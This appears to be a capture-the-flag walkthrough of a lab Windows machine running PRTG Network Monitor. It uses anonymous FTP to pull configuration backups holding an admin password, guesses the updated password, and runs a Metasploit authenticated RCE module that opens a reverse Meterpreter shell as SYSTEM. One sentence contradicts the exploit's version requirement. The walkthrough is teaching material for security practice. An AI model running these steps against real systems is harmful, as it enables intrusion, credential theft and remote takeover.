Enumeration
Nmap
We start by running an nmap scan on the most common 1000 ports using the flag -sV to perform a service/version scan, the -sC flag to perform a script scan using the default set of scripts, and the -Pn flag to skip host discovery:
$ nmap -sC -sV -Pn 10.129.241.175
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-19 05:11 EDT
Nmap scan report for 10.129.241.175
Host is up (0.039s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_02-25-19 11:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-03-19T09:12:02
|_ start_date: 2023-03-19T09:10:57
|_clock-skew: mean: -3s, deviation: 0s, median: -3s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.36 seconds
FTP
Anonymous login
One common misconfiguration when running FTP services is to enable anonymous access, which allows anyone to access the service without authentication. Upon prompting for a username, users can input the anonymous username and any password of their choice, and get in:
$ ftp -p 10.129.241.175
Connected to 10.129.241.175.
220 Microsoft FTP Service
Name (10.129.241.175:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49889|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
02-25-19 11:49PM <DIR> Windows
226 Transfer complete.
User Flag
Inside Users/Public we find the user flag:
ftp> ls
229 Entering Extended Passive Mode (|||49908|)
150 Opening ASCII mode data connection.
02-03-19 08:05AM <DIR> Documents
07-16-16 09:18AM <DIR> Downloads
07-16-16 09:18AM <DIR> Music
07-16-16 09:18AM <DIR> Pictures
03-19-23 05:11AM 34 user.txt
07-16-16 09:18AM <DIR> Videos
226 Transfer complete.
ftp> more user.txt
6d5**************************667
Port 80
We add netmon.htb to /etc/hosts:
$ echo -e "10.129.241.175\tnetmon.htb" | sudo tee -a /etc/hosts
10.129.241.175 netmon.htb
$ whatweb http://netmon.htb
http://netmon.htb [302 Found] Country[RESERVED][ZZ], HTTPServer[PRTG/18.1.37.13946], IP[10.129.241.175], PRTG-Network-Monitor[18.1.37.13946,PRTG], RedirectLocation[/index.htm], UncommonHeaders[x-content-type-options], X-XSS-Protection[1; mode=block]
ERROR Opening: http://netmon.htb/index.htm - incorrect header check
Visiting http://netmon.htb we find a login page for PRT Network Monitor, a software application designed for monitoring and managing computer networks.
Getting Access
In the PRTG Manual we find where the application stores configurations, %programdata%\Paessler\PRTG Network Monitor.
We navigate there and download the PRTG Configuration files and backups:
ftp> cd ProgramData
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50205|)
125 Data connection already open; Transfer starting.
12-15-21 10:40AM <DIR> Corefig
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 12:15AM <DIR> TEMP
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50215|)
125 Data connection already open; Transfer starting.
03-19-23 05:14AM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd PRTG\ Network\ Monitor
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50219|)
150 Opening ASCII mode data connection.
03-19-23 05:13AM <DIR> Configuration Auto-Backups
03-19-23 05:11AM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
03-19-23 05:11AM <DIR> Logs (Web Server)
03-19-23 05:12AM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
12-15-21 11:31AM 1188552 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
03-19-23 05:14AM 1636075 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
ftp> get PRTG\ Configuration.dat
local: PRTG Configuration.dat remote: PRTG Configuration.dat
229 Entering Extended Passive Mode (|||50227|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************| 1161 KiB 1.88 MiB/s 00:00 ETA
226 Transfer complete.
1189697 bytes received in 00:00 (1.88 MiB/s)
ftp> get PRTG\ Configuration.old
local: PRTG Configuration.old remote: PRTG Configuration.old
229 Entering Extended Passive Mode (|||50230|)
150 Opening ASCII mode data connection.
100% |********************************************************************************| 1160 KiB 1.87 MiB/s 00:00 ETA
226 Transfer complete.
1188552 bytes received in 00:00 (1.87 MiB/s)
ftp> get PRTG\ Configuration.old.bak
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
229 Entering Extended Passive Mode (|||50231|)
150 Opening ASCII mode data connection.
100% |********************************************************************************| 1126 KiB 1.90 MiB/s 00:00 ETA
226 Transfer complete.
1153755 bytes received in 00:00 (1.90 MiB/s)
We find credentials in PRTG Configuration.old.bak but they don’t work:
$ grep -B 3 -A 3 password PRTG\ Configuration.old.bak
<dbcredentials>
0
</dbcredentials>
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
<dbtimeout>
60
</dbtimeout>
--
<SNIP>
Note: considering the
xmlstructure of the file, we used-Bto print 3 lines of leading context before matching lines, and-A, to Print 3 lines of trailing context after matching lines.
Since this is an old backup, and given the administrator’s tendency to append a year to the password, we can easily deduce the updated login information by simply modifying the password with the following year, ultimately granting us access (prtgadmin:PrTg@dmin2019).
Getting a Root Shell
Metasploit
Looking for known vulnerabilities we find one that may work:
$ msfconsole -q
msf6 > search prtg
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/prtg_authenticated_rce 2018-06-25 excellent Yes PRTG Network Monitor Authenticated RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/prtg_authenticated_rce
The version installed on the system is 18.1.37.13946 which is lower than the one needed for the RCE exploit to work.
We setup and run the exploit:
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/prtg_authenticated_rce) > show options
Module options (exploit/windows/http/prtg_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
ADMIN_PASSWORD prtgadmin yes The password for the specified username
ADMIN_USERNAME prtgadmin yes The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
ics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.122.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_PASSWORD PrTg@dmin2019
ADMIN_PASSWORD => PrTg@dmin2019
msf6 exploit(windows/http/prtg_authenticated_rce) > set RHOSTS 10.129.241.175
RHOSTS => 10.129.241.175
msf6 exploit(windows/http/prtg_authenticated_rce) > set LHOST 10.10.14.44
LHOST => 10.10.14.44
msf6 exploit(windows/http/prtg_authenticated_rce) > check
[*] 10.129.241.175:80 - The target appears to be vulnerable.
msf6 exploit(windows/http/prtg_authenticated_rce) > run
[*] Started reverse TCP handler on 10.10.14.44:4444
[+] Successfully logged in with provided credentials
[+] Created malicious notification (objid=2020)
[+] Triggered malicious notification
[+] Deleted malicious notification
[*] Waiting for payload execution.. (30 sec. max)
[*] Sending stage (175686 bytes) to 10.129.241.175
[*] Meterpreter session 1 opened (10.10.14.44:4444 -> 10.129.241.175:51414) at 2023-03-19 07:36:54 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
getting in as NT AUTHORITY\SYSTEM.
Root Flag
We find the root flag in the Desktop directory:
meterpreter > pwd
C:\Windows\system32
meterpreter > cd C:
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2016-11-20 21:46:10 -0500 $RECYCLE.BIN
100666/rw-rw-rw- 1024 fil 2019-02-02 23:18:08 -0500 .rnd
100666/rw-rw-rw- 1 fil 2016-07-16 09:10:17 -0400 BOOTNXT
040777/rwxrwxrwx 0 dir 2019-02-03 07:05:38 -0500 Documents and Settings
040777/rwxrwxrwx 0 dir 2016-07-16 09:18:03 -0400 PerfLogs
040555/r-xr-xr-x 4096 dir 2019-02-25 21:56:41 -0500 Program Files
040777/rwxrwxrwx 4096 dir 2019-02-02 23:28:57 -0500 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2021-12-15 09:40:04 -0500 ProgramData
040777/rwxrwxrwx 0 dir 2019-02-03 07:05:39 -0500 Recovery
040777/rwxrwxrwx 0 dir 2019-02-03 07:04:49 -0500 System Volume Information
040555/r-xr-xr-x 4096 dir 2019-02-03 07:08:34 -0500 Users
040777/rwxrwxrwx 16384 dir 2019-02-25 22:49:57 -0500 Windows
100444/r--r--r-- 389408 fil 2016-11-20 20:59:07 -0500 bootmgr
040777/rwxrwxrwx 0 dir 2019-02-25 21:15:12 -0500 inetpub
000000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys
meterpreter > cd Users\\Administrator\\
meterpreter > ls
Listing: C:\Users\Administrator\Desktop\\
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-02-03 07:08:39 -0500 desktop.ini
100444/r--r--r-- 34 fil 2023-03-19 05:11:44 -0400 root.txt
meterpreter > cat root.txt
edd**************************be0